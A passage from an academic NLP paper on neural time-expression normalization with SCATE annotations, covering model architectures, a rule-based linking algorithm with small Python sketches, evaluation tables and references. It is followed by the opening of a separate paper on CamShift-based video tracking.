Identifying SCATE-style time entities is a sequence tagging task, similar to named entity recognition (NER), so we take inspiration from recent work in neural architectures for NER. The first neural NER models followed the prior (non-neural) work in approaching NER as a word classification problem, applying architectures such as sliding-window feedforward neural networks (Qi et al., 2009), convolutional neural networks (CNNs) with conditional random field (CRF) layers (Collobert et al., 2011), and LSTMs with CRF layers and hand-crafted features (Huang et al., 2015). More recently, character-level neural networks have also been proposed for NER, including several which combine a CNN or LSTM for learning character-based representations of words with an LSTM or LSTM-CRF for word-by-word labeling (Chiu and Nichols, 2016; Lample et al., 2016b; Ma and Hovy, 2016), as well as character-by-character sequence-to-sequence networks (Gillick et al., 2016; Kuru et al., 2016).

Based on these works, we consider two forms of input processing for our RNNs: word-by-word vs. character-by-character. Several aspects of the time normalization problem make the character-based approach especially appealing. First, many time phrases involve numbers that must be interpreted semantically (e.g., a good model should learn that months cannot be a number higher than 12), and digit-by-digit processing of numbers allows such interpretations, while treating each number as a word would result in a sparse, intractable learning problem. Second, word-based models assume that we know how to tokenize the text into words, but texts at times present challenging formats such as overnight, where over evokes a LAST operator and night is a PART-OF-DAY. Finally, character-based models can ameliorate out-of-vocabulary (OOV) words, which are a common problem when training on sparse datasets. (Hybrid word-character models, such as the LSTM-CNNs-CRF (Ma and Hovy, 2016), can address this last problem, but not the previous two.)

For our word-based model, we apply the NLTK tokenizer (Bird et al., 2009) to each sentence. We further tokenize with the regular expression "\d+|[^\d\W]+|\S" to break apart alpha-numeric expressions like 1620EDT. However, the tokenizer is unable to break apart expressions such as 19980206 and overnight. For our character-based model, no tokenization is applied and every character (including whitespace characters) is fed as input.

5.2 Time entity composition

Once the entities of the time expressions are identified, they must be composed in order to obtain their semantic interpretation.
This step of the analysis consists of two parts: linking the entities that make up a time expression together, and completing the entities' properties with the proper values. For both cases, we set a simple set of rules that follow the constraints imposed by the SCATE schema (https://github.com/bethard/anafora-annotations/blob/master/.schema/timenorm-schema.xml).

5.2.1 Time entity linking

Algorithm 1 shows the process followed to obtain the links between the time entities. First, we define an empty stack that will store the entities belonging to the same time expression. Then, we iterate over the list of entities of a document sorted by their starting character offsets (SORTBYSTART). For each of these entities (entity1) and for each entity in the stack (entity2), we check if the guidelines specify a possible link (LINKISVALID) between the types of entity1 and entity2. If such a link is possible, and it has not already been filled by another annotation, we greedily make the link (CREATELINK). When the distance in the number of characters between the entity and the end of the stack is bigger than 10, we assume that the entities do not belong to the same time expression, and thus we empty the stack. (The distance threshold was selected based on the performance on the development dataset.)

Algorithm 1: Linking time entities
    stack = ∅
    for entity1 in SORTBYSTART(entities) do
        if START(entity1) - END(stack) > 10 then
            stack = ∅
        end if
        for entity2 in stack do
            if LINKISVALID(entity1, entity2) then
                CREATELINK(entity1, entity2)
            end if
        end for
        PUSH(stack, entity1)
    end for

For example, our time entity identification model gets the YEAR, MONTH-OF-YEAR and DAY-OF-MONTH for the time expression 1992-12-23. Our time entity composition algorithm then iterates over these entities. At the beginning the stack is empty, so it just pushes the entity 1992 (YEAR) onto the stack. For the entity 12 (MONTH-OF-YEAR) it checks if the guidelines define a possible link between this entity type and the one currently in the stack (YEAR). In this case, the guidelines establish that a YEAR can have a SUB-INTERVAL link to a SEASON-OF-YEAR, a MONTH-OF-YEAR or a WEEK-OF-YEAR. Thus, the algorithm creates a SUB-INTERVAL link between 1992 and 12. The entity 12 is then pushed onto the stack. This process is repeated for the entity 23 (DAY-OF-MONTH), checking if there is a possible link to the entities in the stack (1992, 12). The guidelines define a possible SUB-INTERVAL link between MONTH-OF-YEAR and DAY-OF-MONTH, so a link is created here as well. Now, suppose that the following time entity in the list is several words ahead of 23, so the character distance between both entities is larger than 10. If that is the case, the stack is emptied and the process starts again to compose a new time expression.

5.2.2 Property completion

The last step is to associate each time entity of a time expression with a set of properties that include information needed for its interpretation. Our system decides the value of these properties as follows:

TYPE: The SCATE schema defines that some entities can only have specific values. For example, a SEASON-OF-YEAR can only be SPRING, SUMMER, FALL or WINTER, a MONTH-OF-YEAR can only be JANUARY, FEBRUARY, MARCH, etc. To complete this property we take the text span of the time entity and normalize it to the values accepted in the schema. For example, if the span of a MONTH-OF-YEAR entity was the numeric value 01 we would normalize it to JANUARY, if its span was Sep.
we would normalize it to SEPTEMBER, and so on.

VALUE: This property contains the value of a numerical entity, like DAY-OF-MONTH or HOUR-OF-DAY. To complete it, we just take the text span of the entity and convert it to an integer. If it is written in words instead of digits (e.g., nineteen instead of 19), we apply a simple grammar (https://github.com/ghewgill/text2num) to convert it to an integer.

SEMANTICS: In news-style texts, it is common that expressions like last Friday, when the DCT is a Friday, refer to the same day as the DCT instead of the previous occurrence (as it would in more standard usage of last). SCATE indicates this with the SEMANTICS property, where the value INTERVAL-INCLUDED indicates that the current interval is included when calculating the last or next occurrence. For the rest of the cases the value INTERVAL-NOT-INCLUDED is used. In our system, when a LAST operator is found, if it is linked to a DAY-OF-WEEK (e.g. Friday) that matches the DCT, we set the value of this property to INTERVAL-INCLUDED.

INTERVAL-TYPE: Operators like NEXT or LAST need an interval as reference in order to be interpreted. Normally, this reference is the DCT. For example, next week refers to the week following the DCT, and in such a case the value of the property INTERVAL-TYPE for the operator NEXT would be DOCTIME. However, sometimes the operator is linked to an interval that serves as reference by itself, for example, "by the year 2000". In these cases the value of the INTERVAL-TYPE is LINK. Our system sets the value of this property to LINK if the operator is linked to a YEAR and DOCTIME otherwise. This is a very coarse heuristic; finding the proper anchor for a time expression is a challenging open problem for which future research is needed.

5.3 Automatically generated training data

Every document in the dataset starts with a document creation time. These time expressions are quite particular: they occur in isolation and not within the context of a sentence, and they always yield a bounded interval. Thus their identification is a critical factor in an interval-based evaluation metric. However, document times appear in many different formats: "Monday, July-24, 2017", "07/24/17 09:52 AM", "08-15-17 1337 PM", etc. Many of these formats are not covered in the training data, which is drawn from a small number of news sources, each of which uses only a single format. We therefore designed a time generator to randomly generate an extra 800 isolated training examples for a wide variety of such expression formats. The generator covers 33 different formats (we use the common formats available in office suites, specifically LibreOffice), which include variants covering abbreviation, with/without delimiters, mixture of digits and strings, and different sequences of time units.

6 Experiments

We train and evaluate our models on the SCATE corpus described in Section 4. As a development dataset, 14 documents are taken as a random stratified sample from the TempEval 2013 (TimeBank + AQUAINT) portion shown in Table 1, including broadcast news documents (1 ABC, 1 CNN, 1 PRI, 1 VOA) and newswire documents (5 AP, 1 NYT, 4 WSJ). We use the interval-based evaluation metric described in Section 3, but also report more traditional information extraction metrics (precision, recall, and F1) for the time entity identification and composition steps.
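Before turning to the metrics and results, the stack-based linking procedure of Algorithm 1 (Section 5.2.1 above) can also be written as a short, runnable Python routine. This is only a sketch under assumptions: link_is_valid stands in for the SCATE schema lookup, entities are assumed to carry start/end character offsets, and the check that a link slot is not already filled is omitted; the authors' actual implementation may differ.

    def link_entities(entities, link_is_valid, max_gap=10):
        """Greedy stack-based linking of time entities, in the spirit of Algorithm 1.

        entities      : objects with .start and .end character offsets
        link_is_valid : callable(e1, e2) -> bool, standing in for the schema lookup
        max_gap       : character distance beyond which a new time expression starts
        """
        links = []
        stack = []
        for entity1 in sorted(entities, key=lambda e: e.start):
            # Start a new expression if the gap to the entities on the stack is too large.
            if stack and entity1.start - max(e.end for e in stack) > max_gap:
                stack = []
            for entity2 in stack:
                if link_is_valid(entity1, entity2):
                    links.append((entity2, entity1))  # e.g. a SUB-INTERVAL link
            stack.append(entity1)
        return links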
Let S be the set of items predicted by the system and H be the set of items produced by the humans. Precision (P), recall (R), and F1 are defined as:

  P(S, H) = |S ∩ H| / |S|
  R(S, H) = |S ∩ H| / |H|
  F1(S, H) = 2 · P(S, H) · R(S, H) / (P(S, H) + R(S, H))

For these calculations, each item is an annotation, and one annotation is considered equal to another if it has the same character span (offsets), type, and properties (with the definition applying recursively for properties that point to other annotations).

To make the experiments with different neural architectures comparable, we tuned the parameters of all models to achieve the best performance on the development data. Due to space constraints, we only list here the hyper-parameters for our best Char 3-Softmax: the embedding sizes of the character-level text, word-level text, POS tag, and Unicode character category features are 128, 300, 32 and 64, respectively. To avoid overfitting, we used dropout with probabilities 0.25, 0.15 and 0.15 for the 3 features, respectively; the sizes of the first and second layer GRU units are set to 256 and 150. We trained the model with RMSProp optimization on mini-batches of size 120, and followed standard recommendations to leave the optimizer hyperparameter settings at their default values. Each model is trained for at most 800 epochs; the longest training time, for the Char 3-Softmax model, is around 22 hours using 2x NVIDIA Kepler K20X GPUs.

6.1 Model selection

We compare the different time entity identification models described in Section 5.1, training them on the training data and evaluating them on the development data. Among the epochs of each model, we select the epoch based on the output(s) which the model is good at predicting, because basing selection on its weaknesses would yield unstable results in our preliminary experiments. For example, for 3-Softmax models, our selections rely on the performances of non-operators and implicit operators. Table 4 shows the results of the development phase.

Table 4: Precision (P), recall (R), and F1 for the different neural network architectures on time entity identification on the development data.
  Model                  P      R      F1
  Word 1-Sigmoid        60.2   52.0   55.8
  Char 1-Sigmoid        54.0   59.0   56.4
  Word 2-Softmax        58.7   63.9   61.2
  Char 2-Softmax        74.8   72.4   73.6
  Word 3-Softmax        68.3   64.9   66.6
  Char 3-Softmax        88.2   76.1   81.7
  Char 3-Softmax extra  80.6   73.4   76.8

First, we find that the character-based models outperform the word-based models. (We briefly explored using pre-trained word embeddings to try to improve the performance of the Word 1-Sigmoid model, but it yielded a performance that was still worse than the character-based model, so we didn't explore it further.) For example, the best character-based model achieves an F1 of 81.7 (Char 3-Softmax), which is significantly better than the best word-based model, achieving an F1 of only 66.6 (p=0; we used a paired bootstrap resampling significance test). Second, we find that Softmax models outperform Sigmoid models. For example, the Char 3-Softmax model achieves an F1 of 81.7, significantly better than the 56.4 F1 of the Char 1-Sigmoid model (p=0). Third, for both character- and word-based models, we find that 3-Softmax significantly outperforms 2-Softmax: the Char 3-Softmax F1 of 81.7 is better than the Char 2-Softmax F1 of 73.6 (p=0) and the Word 3-Softmax F1 of 66.6 is better than the Word 2-Softmax F1 of 61.2 (p=0.0254).
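As a side note, the annotation-level precision, recall, and F1 defined at the start of this section are straightforward to compute; the helper below is only an illustration over hashable annotation representations (e.g. tuples of span, type and properties), not the scorer used in the paper.

    def precision_recall_f1(system, human):
        """Set-based P, R, F1 over hashable annotation representations."""
        s, h = set(system), set(human)
        tp = len(s & h)                              # items predicted by the system and present in the gold set
        p = tp / len(s) if s else 0.0
        r = tp / len(h) if h else 0.0
        f1 = 2 * p * r / (p + r) if p + r else 0.0
        return p, r, f1

    print(precision_recall_f1({"a", "b", "c"}, {"b", "c", "d"}))  # (0.666..., 0.666..., 0.666...)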
Additionally, we find that all models are better at identifying non-operators than operators, and that the explicit operators are the hardest to solve. For example, the Char 3-Softmax model gets 92.4 F1 for non-operators, 36.1 F1 for explicit operators and 79.1 F1 for implicit operators. Finally, we also train the best model, Char 3-Softmax, using the generated annotations described in Section 5.3 and achieve 76.8 F1 (Char 3-Softmax extra), i.e., the model performs better without the extra data (p=0). This is probably a result of overfitting due to the small variety of time formats in the training and development data.

From this analysis on the development set, we select two variants of the Char 3-Softmax architecture for evaluation on the test set: Char 3-Softmax and Char 3-Softmax extra. These models were then coupled with the rule-based linking system described in Section 5.2 to produce a complete SCATE-style parsing system.

6.2 Model evaluation

We evaluate both Char 3-Softmax and Char 3-Softmax extra on the test set for the identification and composition tasks. Table 5 shows the results.

Table 5: Results on the test set for the time entity identification (Ident) and time entity composition (Comp) steps. For the former we report the performance for each entity set: non-operators (Non-Op), explicit operators (Exp-Op) and implicit operators (Imp-Op).
             Char 3-Softmax          Char 3-Softmax extra
             P      R      F1        P      R      F1
  Non-Op    79.2   63.2   70.3      87.4   63.2   73.4
  Exp-Op    52.6   36.6   43.2      39.8   38.7   39.3
  Imp-Op    53.3   47.1   50.0      65.4   50.0   56.7
  Ident     70.0   54.5   61.3      69.4   55.3   61.5
  Comp      59.7   46.5   52.3      57.7   46.0   51.2

On the identification task, Char 3-Softmax extra is no worse than using the original dataset, with an overall F1 of 61.5 vs. 61.3 (p=0.5899), and using extra generated data the model is better at predicting non-operators and implicit operators with higher precisions (p=0.0096), which is the key to producing correct bounded time intervals.

To compare our approach with the state of the art, we run HeidelTime on the test documents and make use of the metric described in Section 3. This way, we can compare the intervals produced by both systems no matter the annotation schema. Table 6 shows that our model with additional randomly generated training data outperforms HeidelTime in terms of precision, with a significant difference of 12.6 percentage points (p=0.011), while HeidelTime obtains a non-significant better performance in terms of recall (p=0.1826). Overall, our model gets 3.3 more percentage points than HeidelTime in terms of F1 (p=0.2485).

Table 6: Precision (P), recall (R), and F1 of our models on the test data producing bounded time intervals. For comparison, we include the results obtained by HeidelTime.
  Model                  P      R      F1
  HeidelTime            70.9   76.8   73.7
  Char 3-Softmax        73.8   62.4   67.6
  Char 3-Softmax extra  82.7   71.0   76.4

Notice that, although the model trained without extra annotations is better in time entity composition (see Table 5), it performs much worse at producing final intervals. This is caused by the fact that this model fails to identify the non-operators that compound dates in unseen formats (see Section 5.3).

Table 7: Precision (P), recall (R), and F1 on bounded intervals on the TimeML/SCATE perfectly overlapping test data.
  Model                  P      R      F1
  HeidelTime            70.7   80.2   75.1
  Char 3-Softmax        74.3   64.2   68.9
  Char 3-Softmax extra  83.3   74.1   78.4

However, evaluating HeidelTime on the SCATE annotations may not be totally fair.
HeidelTime was developed following the TimeML schema and, as we show in Section 4, SCATE covers a wider set of time expressions. For this reason, we perform an additional evaluation. First, we compare the annotations in the test set using our interval-based metric, similar to the comparison reported in Table 2, and select those cases where TimeML and SCATE match perfectly. Then, we remove the rest of the cases from the test set. Consequently, we also remove the predictions given by the systems, both ours and HeidelTime, for those instances. Finally, we run the interval scorer using the new configuration. As can be seen in Table 7, all the models improve their performance. However, our model still performs better when it is trained with the extra annotations.

The SCATE interpreter that encodes the time intervals needs the compositional graph of a time expression to have all its elements correct. Thus, failing in the identification of any entity of a time expression results in totally uninterpretable graphs. For example, in the expression next year, if our model identifies year as a PERIOD instead of an INTERVAL, it cannot be linked to next because that violates the SCATE schema. The model can also fail in the recognition of some time entities, like summer in the expression last summer. These identification errors are caused mainly by the sparse training data. As graphs containing these errors produce unsolvable logical formulae, the interpreter cannot produce intervals and hence the recall decreases. Within those intervals that are ultimately generated, the most common mistake is to confuse the LAST and NEXT operators, and the result is an incorrectly placed interval even with correctly identified non-operators. For example, if an October with an implicit NEXT operator is instead given a LAST operator, instead of referring to [2013-10-01T00:00, 2013-11-01T00:00), it will refer to [2012-10-01T00:00, 2012-11-01T00:00). Missing implicit operators is also the main source of errors for HeidelTime, which fails with complex compositional graphs. For example, that January day in 2011 is annotated by HeidelTime as two different intervals, corresponding respectively to January and 2011. As a consequence, HeidelTime predicts not one but two incorrect intervals, affecting its precision.

7 Discussion

As for the time entity identification task, the performance differences between the development and test datasets could be attributed to the annotation distributions of the datasets. For example, there are 10 Season-Of-Year annotations in the test set while there are no such annotations in the development dataset; the relative frequencies of the annotations Minute-Of-Hour, Hour-Of-Day, Two-Digit-Year and Time-Zone in the test set are much lower, and our models are good at predicting such annotations. Explicit operators are very lexically dependent, e.g. LAST corresponds to one word from the set {last, latest, previously, recently, past, over, recent, earlier, the past, before}, and the majority of them appear once or twice in the training and development sets.

Our experiments verify the advantages of character-based models in predicting SCATE annotations, which is in agreement with our explanations in Section 5.1.2: word-based models tend to fail to distinguish numbers from digit-based time expressions. It is difficult for word-based models to catch some patterns of time expressions, such as 24th and 25th, August and Aug., etc., while character-based models are robust to such variance.
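The character-level inputs that give these models their robustness are cheap to compute; the sketch below shows how the per-character text and Unicode-category features from Section 5.1.1 can be derived with the Python standard library alone. It is illustrative only; the optional POS lookup is assumed to come from an external tagger.

    import unicodedata

    def char_features(text, pos_tags=None):
        """Per-character features: the character itself and its Unicode category
        (Lu, Ll, Nd, Po, Zs, ...). pos_tags, if given, maps each character index
        to the POS tag of its word; characters outside any word get None."""
        feats = []
        for i, ch in enumerate(text):
            feats.append({
                "char": ch,
                "unicode_cat": unicodedata.category(ch),
                "pos": pos_tags[i] if pos_tags else None,
            })
        return feats

    for f in char_features("May 25"):
        print(f["char"], f["unicode_cat"])
    # M Lu / a Ll / y Ll / (space) Zs / 2 Nd / 5 Nd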
We ran an experiment to see whether these benefits were unique to compositional annotations like those of SCATE, or apply more generally to simply recognizing time expressions. We used the TimeML annotations from AQUAINT and TimeBank (see Table 1) to train two multi-class classifiers to identify TIMEX3 annotations. The models were similar to our Char 3-Softmax and Word 3-Softmax models, using the same parameter settings, but with a single softmax output layer to predict the four types of TIMEX3: DATE, TIME, DURATION, and SET. As shown in Table 8, on the test set the word-based model significantly outperforms the character-based model in terms of both time expressions (p=0.0428) and the subset of time expressions that contain digits (p=0.0007).

Table 8: Precision (P), recall (R), and F1 for character-based and word-based models in predicting TimeML TIMEX3 annotations on the TempEval 2013 test set. TIMEX3-Digits is the subset of annotations that contain digits.
          TIMEX3                TIMEX3-Digits
          P      R      F1      P      R      F1
  Char   70.2   62.7   66.2    73.8   71.4   72.6
  Word   81.3   69.0   74.7    86.2   79.4   82.6

These results suggest that the reason character-based models are more successful on the SCATE annotations is that SCATE breaks time expressions down into meaningful sub-components. For example, TimeML would simply call Monday, 1992-05-04 a DATE, and call 15:00:00 GMT Saturday a TIME. SCATE would identify four and five, respectively, different types of semantic entities in these expressions, and each SCATE entity would be either all letters or all digits. In TimeML, the model is faced with difficult learning tasks, e.g., that sometimes a weekday name is part of a DATE and sometimes it is part of a TIME, while in SCATE, a weekday name is always a DAY-OF-WEEK.

On the other hand, running the entity composition step with gold entity identification achieves 72.6 in terms of F1. One of the main causes of errors in this step is the heuristic to complete the INTERVAL-TYPE property. As we explain in Section 5.2, we implement a too coarse set of rules for this case. Another source of errors is the distance of 10 characters we use to decide if time entities belong to the same time expression. This condition prevents the creation of some links; for example, the expression "Later" at the beginning of a sentence typically refers to another time interval in a previous sentence, so the distance between them is much longer.

8 Conclusion

We have presented the first model for time normalization trained on SCATE-style annotations. The model outperforms the rule-based state of the art, proving that describing time expressions in terms of compositional time entities is suitable for machine learning approaches. This broadens the research in time normalization beyond the more restricted TimeML schema. We have shown that a character-based neural network architecture has advantages for the task over a word-based system, and that a multi-output network performs better than producing a single output. Furthermore, we have defined a new interval-based evaluation metric that allows us to perform a comparison between annotations based on both the SCATE and TimeML schemas, and found that SCATE provides a wider variety of time expressions. Finally, we have seen that the sparse training set available induces model overfitting and that the largest number of errors are committed in those cases that appear less frequently in the annotations. This is more significant in the case of explicit operators because they are very dependent on the lexicon.
Improving performance on these cases is our main goal for future work. Accord- ing to the results presented in this work, it seems that a solution would be to obtain a wider training set, so a promising research line is to extend our approach to automatically generate new annotations. 9 Software The code for the SCATE-style time normalization models introduced in this paper is available at https://github.com/clulab/timenorm. 10 Acknowledgements We thank the anonymous reviewers as well as the action editor, Mona Diab, for helpful comments on an earlier draft of this paper. The work was funded by the THYME project (R01LM010090) from the National Library Of Medicine, and used computing resources supported by the National Science Founda- tion under Grant No. 1228509. The content is solely the responsibility of the authors and does not nec- essarily represent the official views of the National Library Of Medicine, National Institutes of Health, or National Science Foundation. References [Bethard and Parker2016] Steven Bethard and Jonathan Parker. 2016. A semantically compositional anno- tation scheme for time normalization. In Proceedings 354 of the Tenth International Conference on Language Re- sources and Evaluation (LREC 2016), Paris, France, 5. European Language Resources Association (ELRA). [Bethard2013] Steven Bethard. 2013. A synchronous con- text free grammar for time normalization. In Proceed- ings of the 2013 Conference on Empirical Methods in Natural Language Processing, pages 821–826, Seattle, Washington, USA, 10. Association for Computational Linguistics. [Bird et al.2009] Steven Bird, Ewan Klein, and Edward Loper. 2009. Natural language processing with Python: analyzing text with the natural language toolkit. O’Reilly Media, Inc. [Chiu and Nichols2016] Jason P. C. Chiu and Eric Nichols. 2016. Named Entity Recognition with Bidirectional LSTM-CNNs. Transactions of the Association for Computational Linguistic, 4:357–370. [Chung et al.2014] Junyoung Chung, Caglar Gulcehre, KyungHyun Cho, and Yoshua Bengio. 2014. Empiri- cal evaluation of gated recurrent neural networks on se- quence modeling. arXiv preprint arXiv:1412.3555v1. [Collobert et al.2011] Ronan Collobert, Jason Weston, Léon Bottou, Michael Karlen, Koray Kavukcuoglu, and Pavel Kuksa. 2011. Natural language processing (al- most) from scratch. The Journal of Machine Learning Research, 12:2493–2537, November. [Fischer and Strötgen2015] Frank Fischer and Jannik Strötgen. 2015. When Does (German) Literature Take Place? On the Analysis of Temporal Expressions in Large Corpora. In Proceedings of DH 2015: Annual Conference of the Alliance of Digital Humanities Orga- nizations, volume 6, Sydney, Australia. [Gillick et al.2016] Dan Gillick, Cliff Brunk, Oriol Vinyals, and Amarnag Subramanya. 2016. Multilin- gual language processing from bytes. In Kevin Knight, Ani Nenkova, and Owen Rambow, editors, NAACL HLT 2016, The 2016 Conference of the North Ameri- can Chapter of the Association for Computational Lin- guistics: Human Language Technologies, San Diego California, USA, June 12-17, 2016, pages 1296–1306. The Association for Computational Linguistics. [Graves et al.2013] Alex Graves, Abdel-rahman Mo- hamed, and Geoffrey Hinton. 2013. Speech recog- nition with deep recurrent neural networks. In 2013 IEEE International Conference on Acoustics, Speech and Signal Processing, pages 6645–6649. IEEE. [Han and Lavie2004] Benjamin Han and Alon Lavie. 2004. A framework for resolution of time in natural language. 3(1):11–32, March. 
[Huang et al.2015] Zhiheng Huang, Wei Xu, and Kai Yu. 2015. Bidirectional LSTM-CRF models for sequence tagging. CoRR, abs/1508.01991. [Kuru et al.2016] Onur Kuru, Ozan Arkan Can, and Deniz Yuret. 2016. Charner: Character-level named entity recognition. In COLING 2016, 26th International Con- ference on Computational Linguistics, Proceedings of the Conference: Technical Papers, December 11-16, 2016, Osaka, Japan, pages 911–921. [Lample et al.2016a] Guillaume Lample, Miguel Balles- teros, Sandeep Subramanian, Kazuya Kawakami, and Chris Dyer. 2016a. Neural architectures for named entity recognition. In Proceedings of the 2016 Con- ference of the North American Chapter of the Associa- tion for Computational Linguistics: Human Language Technologies, pages 260–270. Association for Compu- tational Linguistics. [Lample et al.2016b] Guillaume Lample, Miguel Balles- teros, Sandeep Subramanian, Kazuya Kawakami, and Chris Dyer. 2016b. Neural architectures for named entity recognition. In NAACL HLT 2016, The 2016 Conference of the North American Chapter of the As- sociation for Computational Linguistics: Human Lan- guage Technologies, San Diego California, USA, June 12-17, 2016, pages 260–270. [Lee et al.2014] Kenton Lee, Yoav Artzi, Jesse Dodge, and Luke Zettlemoyer. 2014. Context-dependent semantic parsing for time expressions. In Proceedings of the 52nd Annual Meeting of the Association for Compu- tational Linguistics (Volume 1: Long Papers), pages 1437–1447, Baltimore, Maryland, 6. Association for Computational Linguistics. [Lin et al.2015] Chen Lin, Elizabeth W. Karlson, Dmitriy Dligach, Monica P. Ramirez, Timothy A. Miller, Huan Mo, Natalie S. Braggs, Andrew Cagan, Vivian S. Gainer, Joshua C. Denny, and Guergana K. Savova. 2015. Automatic identification of methotrexate- induced liver toxicity in patients with rheumatoid arthritis from the electronic medical record. Jour- nal of the American Medical Informatics Association, 22(e1):e151–e161. [Llorens et al.2012] Hector Llorens, Leon Derczynski, Robert J. Gaizauskas, and Estela Saquete. 2012. TIMEN: An Open Temporal Expression Normalisa- tion Resource. In Language Resources and Evaluation Conference, pages 3044–3051. European Language Re- sources Association (ELRA). [Ma and Hovy2016] Xuezhe Ma and Eduard Hovy. 2016. End-to-end Sequence Labeling via Bi-directional LSTM-CNNs-CRF. In Proceedings of the 54th Annual Meeting of the Association for Computational Linguis- tics (ACL 2016), volume 1. Association for Computa- tional Linguistics. [Mazur and Dale2010] Pawet Mazur and Robert Dale. 2010. Wikiwars: A new corpus for research on tempo- ral expressions. In Proceedings of the 2010 Conference on Empirical Methods in Natural Language Processing, EMNLP ’10, pages 913–922, Stroudsburg, PA, USA. Association for Computational Linguistics. 355 [Plank et al.2016] Barbara Plank, Anders Søgaard, and Yoav Goldberg. 2016. Multilingual part-of-speech tag- ging with bidirectional long short-term memory models and auxiliary loss. In Proceedings of the 54th Annual Meeting of the Association for Computational Linguis- tics (Volume 2: Short Papers), pages 412–418, Berlin, Germany, August. Association for Computational Lin- guistics. [Pustejovsky et al.2003a] James Pustejovsky, José Castaño, Robert Ingria, Roser Saurı́, Robert Gaizauskas, Andrea Setzer, and Graham Katz. 2003a. TimeML: Robust Specification of Event and Temporal Expressions in Text. In IWCS-5, Fifth International Workshop on Computational Semantics. 
[Pustejovsky et al.2003b] James Pustejovsky, Patrick Hanks, Roser Sauri, Andrew See, Robert Gaizauskas, Andrea Setzer, Dragomir Radev, Beth Sundheim, David Day, Lisa Ferro, and Marcia Lazo. 2003b. The TimeBank corpus. In Proceedings of Corpus Linguistics 2003, Lancaster. [Pustejovsky et al.2010] James Pustejovsky, Kiyong Lee, Harry Bunt, and Laurent Romary. 2010. ISO-TimeML: An International Standard for Semantic Annotation. In Proceedings of the 7th International Conference on Language Resources and Evaluation (LREC’10), Val- letta, Malta. European Language Resources Associa- tion (ELRA). [Qi et al.2009] Yanjun Qi, Koray Kavukcuoglu, Ronan Collobert, Jason Weston, and Pavel P. Kuksa. 2009. Combining labeled and unlabeled data with word-class distribution learning. In Proceedings of the 18th ACM conference on Information and knowledge management, ACM, pages 1737–1740. [Schilder2004] Frank Schilder. 2004. Extracting meaning from temporal nouns and temporal prepositions. ACM Transactions on Asian Language Information Process- ing (TALIP) - Special Issue on Temporal Information Processing, 3(1):33–50, March. [Strötgen and Gertz2013] Jannik Strötgen and Michael Gertz. 2013. Multilingual and cross-domain tem- poral tagging. Language Resources and Evaluation, 47(2):269–298. [Strötgen and Gertz2015] Jannik Strötgen and Michael Gertz. 2015. A baseline temporal tagger for all lan- guages. In Proceedings of the 2015 Conference on Empirical Methods in Natural Language Processing, pages 541–547, Lisbon, Portugal, September. Associa- tion for Computational Linguistics. [Strötgen et al.2013] Jannik Strötgen, Julian Zell, and Michael Gertz. 2013. Heideltime: Tuning English and developing Spanish resources for TempEval-3. In Proceedings of the Seventh International Workshop on Semantic Evaluation, SemEval ’13, pages 15–19. Asso- ciation for Computational Linguistics. [Toutanova et al.2003] Kristina Toutanova, Dan Klein, Christopher D. Manning, and Yoram Singer. 2003. Feature-rich part-of-speech tagging with a cyclic de- pendency network. In Proceedings of the 2003 Confer- ence of the North American Chapter of the Association for Computational Linguistics on Human Language Technology - Volume 1, NAACL ’03, pages 173–180, Stroudsburg, PA, USA. Association for Computational Linguistics. [UzZaman et al.2013] Naushad UzZaman, Hector Llorens, Leon Derczynski, James Allen, Marc Verhagen, and James Pustejovsky. 2013. SemEval-2013 Task 1: TempEval-3: Evaluating Time Expressions, Events, and Temporal Relations. In Second Joint Conference on Lexical and Computational Semantics (*SEM), Volume 2: Proceedings of the Seventh International Workshop on Semantic Evaluation (SemEval 2013), pages 1–9, At- lanta, Georgia, USA, 6. Association for Computational Linguistics. [Verhagen et al.2007] Marc Verhagen, Robert Gaizauskas, Frank Schilder, Mark Hepple, Graham Katz, and James Pustejovsky. 2007. SemEval-2007 Task 15: TempEval Temporal Relation Identification. In Proceedings of the 4th International Workshop on Semantic Evaluations, SemEval ’07, pages 75–80, Prague, Czech Republic. [Verhagen et al.2010] Marc Verhagen, Roser Sauri, Tom- maso Caselli, and James Pustejovsky. 2010. SemEval- 2010 Task 13: TempEval-2. In Proceedings of the 5th International Workshop on Semantic Evaluation, pages 57–62, Uppsala, Sweden, 7. Association for Computa- tional Linguistics. 
[Vossen et al.2016] Piek Vossen, Rodrigo Agerri, Itziar Aldabe, Agata Cybulska, Marieke van Erp, Antske Fokkens, Egoitz Laparra, Anne-Lyse Minard, Alessio Palmero Aprosio, German Rigau, Marco Rospocher, and Roxane Segers. 2016. NewsReader: Using knowledge resources in a cross-lingual reading machine to generate more knowledge from massive streams of news. Special Issue Knowledge-Based Systems, Elsevier. 356 work_2sjrdf2ktjborjpbns3i4rort4 ---- 基于CamShift的视频跟踪算法改进及实现 International Journal of Advanced Network, Monitoring and Controls Volume 03, No.04, 2018 97 Improvement and Realization of CamShift Algorithm Based MotionImage Tracking Wang Yubian* Department of Railway Transportation Control Belarusian State University of Transport, 34, Kirova street, Gomel,246653, Republic of Belarus *is the communication author. e-mail: alika_wang@mail.ru Yuri Shebzukhov Department of the International Relations Belarusian State University of Transport, Republic of Belarus 34, Kirova street, Gomel, 246653, Republic of Belarus e-mail: oms@bsut.by Abstract—The detection and tracking technology of moving object image is one of the key technologies of computer vision, and is widely used in many fields such as industry, transportation, and military. The detection and tracing of moving object in the motion scenes based on the UAV platform is a technical difficulty in this field. In practical applications, the characteristics of complicated environment, small target object and moving platform require higher real-time performance and reliability of the algorithm. If it is possible to add some other features of the target to the tracking process, it will be possible to improve the shortcomings of Camshift itself. Based on the Camshift tracking algorithm, this paper integrates SURF feature detection into the algorithm, which greatly improves the tracking accuracy of the target object, and also has better real-time performance which can achieve better tracking performance of the object. Keywords-Motion Image; CamShift Algorithm; SURF; Feature Detection I. INTRODUCTION Video tracking is the key technology for motion target object detection in dynamic sceneson UAV platform. It can be realized by two methods: one is based on target recognition technology, of which the core concept is frame-by-frame recognition algorithm for motion video to identify the target object and determine the target matching. The other is based on the detection technology of the moving object, of which the core concept is the active detection of the moving object, and the position of the moving object is determined in accordance with the detection result to realize the tracking.This method can achieve the tracking of any moving object without the need of complicated priori information for detection, such ascharacteristics of object shape, object sizes. However, the tracking effect of various tracking algorithms also depends on the background migration of the object, the unpredictable tracking path, the unpredictable target motion path and mode, the scene switch, the target object movement does not have an analyzable pattern, the change of camera model, the camera shift, and the change of illumination condition. And the causes of the changes in the color and shape of the moving object are very different [1]. 
